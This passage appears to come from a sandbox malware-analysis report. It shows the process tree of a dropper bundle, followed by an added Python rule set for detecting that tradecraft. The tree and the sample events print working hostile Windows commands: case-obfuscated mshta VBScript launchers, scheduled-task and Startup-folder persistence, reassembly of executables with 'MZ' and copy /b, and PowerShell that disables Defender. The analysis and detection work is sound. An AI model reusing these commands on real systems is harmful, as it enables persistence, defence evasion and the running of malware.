        signatures: Loads dropped DLL
      [4] C:\Users\Admin\AppData\Local\Temp\7zS0E1E32D5\Sat22e3a2307e6bf2328.exe  (PID 1400)
          command: Sat22e3a2307e6bf2328.exe
          signatures: Executes dropped EXE; Loads dropped DLL
    [3] C:\Windows\SysWOW64\cmd.exe  (PID 2012)
        command: C:\Windows\system32\cmd.exe /c Sat2232f60f4b1f89dd2.exe
        signatures: Loads dropped DLL
      [4] C:\Users\Admin\AppData\Local\Temp\7zS0E1E32D5\Sat2232f60f4b1f89dd2.exe  (PID 1824)
          command: Sat2232f60f4b1f89dd2.exe
          signatures: Executes dropped EXE; Loads dropped DLL
        [5] C:\Users\Admin\AppData\Local\Temp\is-LPFDN.tmp\Sat2232f60f4b1f89dd2.tmp  (PID 1936)
            command: "C:\Users\Admin\AppData\Local\Temp\is-LPFDN.tmp\Sat2232f60f4b1f89dd2.tmp" /SL5="$70152,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS0E1E32D5\Sat2232f60f4b1f89dd2.exe"
            signatures: Executes dropped EXE; Loads dropped DLL
          [6] C:\Users\Admin\AppData\Local\Temp\7zS0E1E32D5\Sat2232f60f4b1f89dd2.exe  (PID 2052)
              command: "C:\Users\Admin\AppData\Local\Temp\7zS0E1E32D5\Sat2232f60f4b1f89dd2.exe" /SILENT
              signatures: Executes dropped EXE; Loads dropped DLL
            [7] C:\Users\Admin\AppData\Local\Temp\is-1TB16.tmp\Sat2232f60f4b1f89dd2.tmp  (PID 2092)
                command: "C:\Users\Admin\AppData\Local\Temp\is-1TB16.tmp\Sat2232f60f4b1f89dd2.tmp" /SL5="$20168,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS0E1E32D5\Sat2232f60f4b1f89dd2.exe" /SILENT
                signatures: Executes dropped EXE; Loads dropped DLL
              [8] C:\Users\Admin\AppData\Local\Temp\is-KHSU3.tmp\winhostdll.exe  (PID 2636)
                  command: "C:\Users\Admin\AppData\Local\Temp\is-KHSU3.tmp\winhostdll.exe" ss1
    [3] C:\Windows\SysWOW64\cmd.exe  (PID 1644)
        command: C:\Windows\system32\cmd.exe /c Sat22bb7b5b45bcfb.exe
        signatures: Loads dropped DLL
      [4] C:\Users\Admin\AppData\Local\Temp\7zS0E1E32D5\Sat22bb7b5b45bcfb.exe  (PID 1076)
          command: Sat22bb7b5b45bcfb.exe
          signatures: Executes dropped EXE; Loads dropped DLL
        [5] C:\Users\Admin\AppData\Local\Temp\7zS0E1E32D5\Sat22bb7b5b45bcfb.exe  (PID 3020)
            command: C:\Users\Admin\AppData\Local\Temp\7zS0E1E32D5\Sat22bb7b5b45bcfb.exe
    [3] C:\Windows\SysWOW64\cmd.exe  (PID 1736)
        command: C:\Windows\system32\cmd.exe /c Sat224bdd8c5c15.exe
        signatures: Loads dropped DLL
    [3] C:\Windows\SysWOW64\cmd.exe  (PID 1900)
        command: C:\Windows\system32\cmd.exe /c Sat22d3494af9.exe
        signatures: Loads dropped DLL
      [4] C:\Users\Admin\AppData\Local\Temp\7zS0E1E32D5\Sat22d3494af9.exe  (PID 1308)
          command: Sat22d3494af9.exe
          signatures: Executes dropped EXE
    [3] C:\Windows\SysWOW64\cmd.exe  (PID 1616)
        command: C:\Windows\system32\cmd.exe /c Sat221d8ea09eebfe.exe
        signatures: Loads dropped DLL
    [3] C:\Windows\SysWOW64\cmd.exe  (PID 1268)
        command: C:\Windows\system32\cmd.exe /c Sat223a93262ea5e8d3.exe
        signatures: Loads dropped DLL
[1] C:\Users\Admin\AppData\Local\Temp\7zS0E1E32D5\Sat223a93262ea5e8d3.exe  (PID 896)
    command: Sat223a93262ea5e8d3.exe
    signatures: Executes dropped EXE; Loads dropped DLL
  [2] C:\Users\Admin\AppData\Local\Temp\is-KGRII.tmp\Sat223a93262ea5e8d3.tmp  (PID 1376)
      command: "C:\Users\Admin\AppData\Local\Temp\is-KGRII.tmp\Sat223a93262ea5e8d3.tmp" /SL5="$60154,1104945,831488,C:\Users\Admin\AppData\Local\Temp\7zS0E1E32D5\Sat223a93262ea5e8d3.exe"
      signatures: Executes dropped EXE

[1] C:\Users\Admin\AppData\Local\Temp\7zS0E1E32D5\Sat221d8ea09eebfe.exe  (PID 2020)
    command: Sat221d8ea09eebfe.exe
    signatures: Executes dropped EXE; Checks BIOS information in registry; Loads dropped DLL; Checks whether UAC is enabled; Suspicious use of NtSetInformationThreadHideFromDebugger; Suspicious behavior: EnumeratesProcesses
  [2] C:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exe  (PID 2284)
      command: "C:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exe"
      signatures: Executes dropped EXE; Loads dropped DLL
    [3] C:\Windows\SysWOW64\schtasks.exe  (PID 2812)
        command: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN tkools.exe /TR "C:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exe" /F
        signatures: Creates scheduled task(s)
    [3] C:\Windows\SysWOW64\cmd.exe  (PID 2780)
        command: "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\2303a34fa8\
      [4] C:\Windows\SysWOW64\reg.exe  (PID 2908)
          command: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\2303a34fa8\
[1] C:\Users\Admin\AppData\Local\Temp\7zS0E1E32D5\Sat224bdd8c5c15.exe  (PID 1696)
    command: Sat224bdd8c5c15.exe
    signatures: Executes dropped EXE
  [2] C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe  (PID 2668)
      command: "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
    [3] C:\Users\Admin\AppData\Local\Temp\chrome.exe  (PID 908)
        command: "C:\Users\Admin\AppData\Local\Temp\chrome.exe"
    [3] C:\Users\Admin\AppData\Local\Temp\SoftwareInstaller2122.exe  (PID 2632)
        command: "C:\Users\Admin\AppData\Local\Temp\SoftwareInstaller2122.exe"
      [4] C:\Users\Admin\AppData\Roaming\6542280.exe  (PID 1012)
          command: "C:\Users\Admin\AppData\Roaming\6542280.exe"
      [4] C:\Users\Admin\AppData\Roaming\7097430.exe  (PID 3392)
          command: "C:\Users\Admin\AppData\Roaming\7097430.exe"
      [4] C:\Users\Admin\AppData\Roaming\4342298.exe  (PID 3408)
          command: "C:\Users\Admin\AppData\Roaming\4342298.exe"
      [4] C:\Users\Admin\AppData\Roaming\1587167.exe  (PID 3452)
          command: "C:\Users\Admin\AppData\Roaming\1587167.exe"
      [4] C:\Users\Admin\AppData\Roaming\5075556.exe  (PID 3712)
          command: "C:\Users\Admin\AppData\Roaming\5075556.exe"
      [4] C:\Users\Admin\AppData\Roaming\3600180.exe  (PID 3868)
          command: "C:\Users\Admin\AppData\Roaming\3600180.exe"
        [5] C:\Users\Admin\AppData\Roaming\8885137.exe  (PID 3364)
            command: "C:\Users\Admin\AppData\Roaming\8885137.exe"
          [6] C:\Windows\SysWOW64\mshta.exe  (PID 3492)
              command: "C:\Windows\System32\mshta.exe" VbscriPt: clOSE(cREateObject( "wSCrIpt.ShELl" ). RUn ( "cMD.exE /q /R tYPe ""C:\Users\Admin\AppData\Roaming\8885137.exe"" > ..\81YF5TZIW.ExE&& sTarT ..\81YF5TZIW.exE /PvWRgT~XF843YaMCVQMy4mT& if """" == """" for %p In ( ""C:\Users\Admin\AppData\Roaming\8885137.exe"" ) do taskkill /f /iM ""%~Nxp"" " , 0 ,TrUE ) )
            [7] C:\Windows\SysWOW64\cmd.exe  (PID 1640)
                command: "C:\Windows\System32\cmd.exe" /q /R tYPe "C:\Users\Admin\AppData\Roaming\8885137.exe" > ..\81YF5TZIW.ExE&& sTarT ..\81YF5TZIW.exE /PvWRgT~XF843YaMCVQMy4mT&if "" == "" for %p In ( "C:\Users\Admin\AppData\Roaming\8885137.exe" ) do taskkill /f /iM "%~Nxp"
              [8] C:\Windows\SysWOW64\taskkill.exe  (PID 1996)
                  command: taskkill /f /iM "8885137.exe"
                  signatures: Kills process with taskkill
        [5] C:\Users\Admin\AppData\Roaming\2488554.exe  (PID 3448)
            command: "C:\Users\Admin\AppData\Roaming\2488554.exe"
          [6] C:\Users\Admin\AppData\Roaming\2488554.exe  (PID 628)
              command: "C:\Users\Admin\AppData\Roaming\2488554.exe"
      [4] C:\Users\Admin\AppData\Roaming\959357.exe  (PID 4012)
          command: "C:\Users\Admin\AppData\Roaming\959357.exe"
    [3] C:\Users\Admin\AppData\Local\Temp\Worldoffer.exe  (PID 2656)
        command: "C:\Users\Admin\AppData\Local\Temp\Worldoffer.exe"
    [3] C:\Users\Admin\AppData\Local\Temp\inst1.exe  (PID 3048)
        command: "C:\Users\Admin\AppData\Local\Temp\inst1.exe"
    [3] C:\Users\Admin\AppData\Local\Temp\chrome update.exe  (PID 1564)
        command: "C:\Users\Admin\AppData\Local\Temp\chrome update.exe"
    [3] C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe  (PID 2740)
        command: "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"
      [4] C:\Windows\SysWOW64\mshta.exe  (PID 396)
          command: "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )
        [5] C:\Windows\SysWOW64\cmd.exe  (PID 840)
            command: "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ) do taskkill -f -iM "%~NxM"
          [6] C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe  (PID 2648)
              command: ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi
            [7] C:\Windows\SysWOW64\mshta.exe  (PID 992)
                command: "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )
              [8] C:\Windows\SysWOW64\cmd.exe  (PID 1096)
                  command: "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If "/PLQtzfgO0m8dRv4iYALOqi "=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"
            [7] C:\Windows\SysWOW64\mshta.exe  (PID 3748)
                command: "C:\Windows\System32\mshta.exe" VbScRIpt:CLosE ( cReAteobjEcT("wscRiPt.SheLl" ). RUn ("C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE) )
              [8] C:\Windows\SysWOW64\cmd.exe  (PID 3840)
                  command: "C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V +1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC& Del /q *&starT msiexec -Y ..\lXQ2g.WC
                [9] C:\Windows\SysWOW64\cmd.exe  (PID 3924)
                    command: C:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"
                [9] C:\Windows\SysWOW64\cmd.exe  (PID 3916)
                    command: C:\Windows\system32\cmd.exe /S /D /c" EcHo "
                [9] C:\Windows\SysWOW64\msiexec.exe  (PID 2660)
                    command: msiexec -Y ..\lXQ2g.WC
          [6] C:\Windows\SysWOW64\taskkill.exe  (PID 2144)
              command: taskkill -f -iM "search_hyperfs_206.exe"
              signatures: Kills process with taskkill
    [3] C:\Users\Admin\AppData\Local\Temp\setup.exe  (PID 2492)
        command: "C:\Users\Admin\AppData\Local\Temp\setup.exe"
      [4] C:\Windows\SysWOW64\cmd.exe  (PID 2792)
          command: "C:\Windows\System32\cmd.exe" /c taskkill /im "setup.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\setup.exe" & exit
        [5] C:\Windows\SysWOW64\taskkill.exe  (PID 2408)
            command: taskkill /im "setup.exe" /f
            signatures: Kills process with taskkill
    [3] C:\Users\Admin\AppData\Local\Temp\yangjing-game.exe  (PID 836)
        command: "C:\Users\Admin\AppData\Local\Temp\yangjing-game.exe"
    [3] C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe  (PID 2788)
        command: "C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"
    [3] C:\Users\Admin\AppData\Local\Temp\chrome1.exe  (PID 1172)
        command: "C:\Users\Admin\AppData\Local\Temp\chrome1.exe"
    [3] C:\Users\Admin\AppData\Local\Temp\chrome2.exe  (PID 3080)
        command: "C:\Users\Admin\AppData\Local\Temp\chrome2.exe"
    [3] C:\Users\Admin\AppData\Local\Temp\chrome3.exe  (PID 3140)
        command: "C:\Users\Admin\AppData\Local\Temp\chrome3.exe"
    [3] C:\Users\Admin\AppData\Local\Temp\Chrome5.exe  (PID 3260)
        command: "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"
      [4] C:\Windows\System32\conhost.exe  (PID 1188)
          command: "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"
        [5] C:\Windows\System32\cmd.exe  (PID 2016)
            command: "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"
          [6] C:\Windows\system32\schtasks.exe  (PID 2216)
              command: schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"
              signatures: Creates scheduled task(s)
        [5] C:\Windows\System32\cmd.exe  (PID 2700)
            command: "cmd" cmd /c "C:\Users\Admin\AppData\Roaming\services64.exe"
          [6] C:\Users\Admin\AppData\Roaming\services64.exe  (PID 3204)
              command: C:\Users\Admin\AppData\Roaming\services64.exe
            [7] C:\Windows\System32\conhost.exe  (PID 344)
                command: "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\services64.exe"
[1] C:\Windows\system32\rundll32.exe  (PID 2544)
    command: rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
    signatures: Process spawned unexpected child process
  [2] C:\Windows\SysWOW64\rundll32.exe  (PID 2552)
      command: rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global

[1] C:\Windows\system32\svchost.exe  (PID 2716)
    command: C:\Windows\system32\svchost.exe -k SystemNetworkService

[1] C:\Windows\system32\conhost.exe  (PID 1548)
    command: \??\C:\Windows\system32\conhost.exe "1060880762-2126248612779256579-648600213-1559884336-2104860174-1420347790-42508519"
    signatures: Executes dropped EXE; Loads dropped DLL

[1] C:\Windows\system32\taskeng.exe  (PID 4092)
    command: taskeng.exe {DC7E790D-235A-445B-A719-1126D82C5E51} S-1-5-21-103686315-404690609-2047157615-1000:EDWYFHKN\Admin:Interactive:[1]
  [2] C:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exe  (PID 3196)
      command: C:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exe

[1] C:\Windows\system32\rundll32.exe  (PID 3216)
    command: rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
    signatures: Process spawned unexpected child process
  [2] C:\Windows\SysWOW64\rundll32.exe  (PID 956)
      command: rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global

[1] C:\Windows\system32\makecab.exe  (PID 3544)
    command: "C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20211123003022.log C:\Windows\Logs\CBS\CbsPersist_20211123003022.cab
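The tree above reduces to a handful of repeatable command-line and parent/child patterns: Defender tampering through Set-MpPreference and Add-MpPreference, schtasks persistence into user-writable paths (every minute for tkools.exe, at logon with highest run level for services64), the Startup shell-folder redirection, case-randomised mshta.exe VBScript wrappers, the 'MZ' plus copy /b reassembly, DLL loading through regsvr32 -S ... -u and msiexec -Y, wmiprvse.exe spawning rundll32.exe, and conhost.exe being handed a user-writable EXE as its argument. The rule set below is an added example, not code from the report or from any tool or malware family it names. EVENTS is constructed from the command lines in the tree with Sysmon-style field names and is not a real log export; the rule names and patterns are illustrative choices to tune against your own telemetry.

```python
"""Rule-based triage of process-creation events for the tradecraft shown in the process tree.

Added example, not code from the sandbox report or from any malware family it names. EVENTS is
constructed from the command lines in the tree (Sysmon Event ID 1 field names, loosely) and is
not a real log export; the rules are starting points to tune, not a complete detection set.
"""
import re
from typing import Dict, List


def normalize(cmdline: str) -> str:
    """Fold case and collapse whitespace so 'cMD.exE   /q /R tYPe' matches like 'cmd.exe /q /r type'."""
    return re.sub(r"\s+", " ", cmdline).strip().lower()


# Rules over the normalised command line, in the order hits are reported.
COMMAND_LINE_RULES = [
    ("defender_tamper", re.compile(
        r"set-mppreference -disablerealtimemonitoring|add-mppreference -exclusionpath"
        r"|-mapsreporting disable|-submitsamplesconsent neversend")),
    ("schtasks_to_user_path", re.compile(r'schtasks(\.exe)?"? .*/create .*/tr "?c:\\users\\')),
    ("schtasks_every_minute", re.compile(r'schtasks(\.exe)?"? .*/sc minute /mo 1\b')),
    ("schtasks_onlogon_highest", re.compile(r'schtasks(\.exe)?"? .*/sc onlogon .*/rl highest')),
    ("startup_folder_redirect", re.compile(
        r'reg(\.exe)?"? add "hkcu\\software\\microsoft\\windows\\currentversion\\explorer\\user shell folders" .*/v startup')),
    ("mshta_inline_vbscript", re.compile(r'mshta(\.exe)?"? vbscript:.*createobject ?\( ?"wscript\.shell" ?\)')),
    ("self_copy_then_taskkill", re.compile(r'(type|copy /y) "*c:\\users\\.*&& ?start \.\.\\.*taskkill')),
    ("pe_reassembly_via_copy", re.compile(r'set /p = "mz".*copy /b')),
    ("dll_load_via_lolbin", re.compile(r'\b(regsvr32(\.exe)?"? -s |msiexec(\.exe)?"? -y )')),
]


def classify(event: Dict[str, object]) -> List[str]:
    """Return the rule names that fire for one process-creation event."""
    cmd = normalize(str(event.get("CommandLine", "")))
    image = str(event.get("Image", "")).lower()
    parent = str(event.get("ParentImage", "")).lower()
    hits = [name for name, rx in COMMAND_LINE_RULES if rx.search(cmd)]
    # Parent/child relationships the command line alone does not reveal.
    if parent.endswith(r"\wbem\wmiprvse.exe") and image.endswith(r"\rundll32.exe"):
        hits.append("wmiprvse_spawns_rundll32")      # WMI Win32_Process.Create launching rundll32
    if image.endswith(r"\conhost.exe") and re.search(r'"c:\\users\\[^"]+\.exe"', cmd):
        hits.append("conhost_hosting_user_binary")   # conhost.exe given a user-writable EXE as argument
    return hits


def triage(events: List[Dict[str, object]]) -> Dict[int, List[str]]:
    """Map ProcessId -> fired rules for every event that fired at least one rule."""
    result: Dict[int, List[str]] = {}
    for e in events:
        hits = classify(e)
        if hits:
            result[int(str(e["ProcessId"]))] = hits
    return result


def ev(pid: int, image: str, parent: str, cmdline: str) -> Dict[str, object]:
    return {"ProcessId": pid, "Image": image, "ParentImage": parent, "CommandLine": cmdline}


TEMP = r"C:\Users\Admin\AppData\Local\Temp"
SYSWOW = r"C:\Windows\SysWOW64"
EVENTS = [  # constructed from the process tree above; not a real log export
    ev(1144, SYSWOW + r"\WindowsPowerShell\v1.0\powershell.exe", SYSWOW + r"\cmd.exe",
       r'powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"'),
    ev(1528, SYSWOW + r"\WindowsPowerShell\v1.0\powershell.exe", SYSWOW + r"\cmd.exe",
       r'powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable'),
    ev(2812, SYSWOW + r"\schtasks.exe", TEMP + r"\2303a34fa8\tkools.exe",
       r'"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN tkools.exe /TR "C:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exe" /F'),
    ev(2908, SYSWOW + r"\reg.exe", SYSWOW + r"\cmd.exe",
       r'REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\2303a34fa8' + "\\"),
    ev(3492, SYSWOW + r"\mshta.exe", r"C:\Users\Admin\AppData\Roaming\8885137.exe",
       r'"C:\Windows\System32\mshta.exe" VbscriPt: clOSE(cREateObject( "wSCrIpt.ShELl" ). RUn ( "cMD.exE /q /R tYPe ""C:\Users\Admin\AppData\Roaming\8885137.exe"" > ..\81YF5TZIW.ExE&& sTarT ..\81YF5TZIW.exE /PvWRgT~XF843YaMCVQMy4mT& if """" == """" for %p In ( ""C:\Users\Admin\AppData\Roaming\8885137.exe"" ) do taskkill /f /iM ""%~Nxp"" " , 0 ,TrUE ) )'),
    ev(3132, SYSWOW + r"\cmd.exe", SYSWOW + r"\mshta.exe",
       r'"C:\Windows\system32\cmd.exe" /Q /R eChO | SeT /p = "MZ" > UXzDKCI.vL &Copy /B /y UXZDKCI.VL + BvNdvRB2.Vn+ SnmqF.N ..\8Kw4W.V~W & sTarT regsvr32 -S ..\8kw4W.V~W -u & deL /q *'),
    ev(2660, SYSWOW + r"\msiexec.exe", SYSWOW + r"\cmd.exe", r"msiexec -Y ..\lXQ2g.WC"),
    ev(2544, r"C:\Windows\system32\rundll32.exe", r"C:\Windows\system32\wbem\wmiprvse.exe",
       r'rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global'),
    ev(1188, r"C:\Windows\System32\conhost.exe", TEMP + r"\Chrome5.exe",
       r'"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"'),
    ev(2216, r"C:\Windows\system32\schtasks.exe", r"C:\Windows\System32\cmd.exe",
       r'schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"'),
    ev(3544, r"C:\Windows\system32\makecab.exe", "",  # benign servicing noise; parent not captured
       r'"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20211123003022.log C:\Windows\Logs\CBS\CbsPersist_20211123003022.cab'),
]

if __name__ == "__main__":
    for pid, hits in triage(EVENTS).items():
        print(pid, ", ".join(hits))
```

The normalisation step matters more than any single pattern here: every mshta.exe and cmd.exe line in the tree is case-randomised and whitespace-padded precisely to defeat literal string matching, and the two-stage shape (one rule for the wrapper, one for what it launches) lets a single chain fire several rules so the score can rise with depth instead of depending on one brittle string. The makecab.exe event is included as a control that should fire nothing.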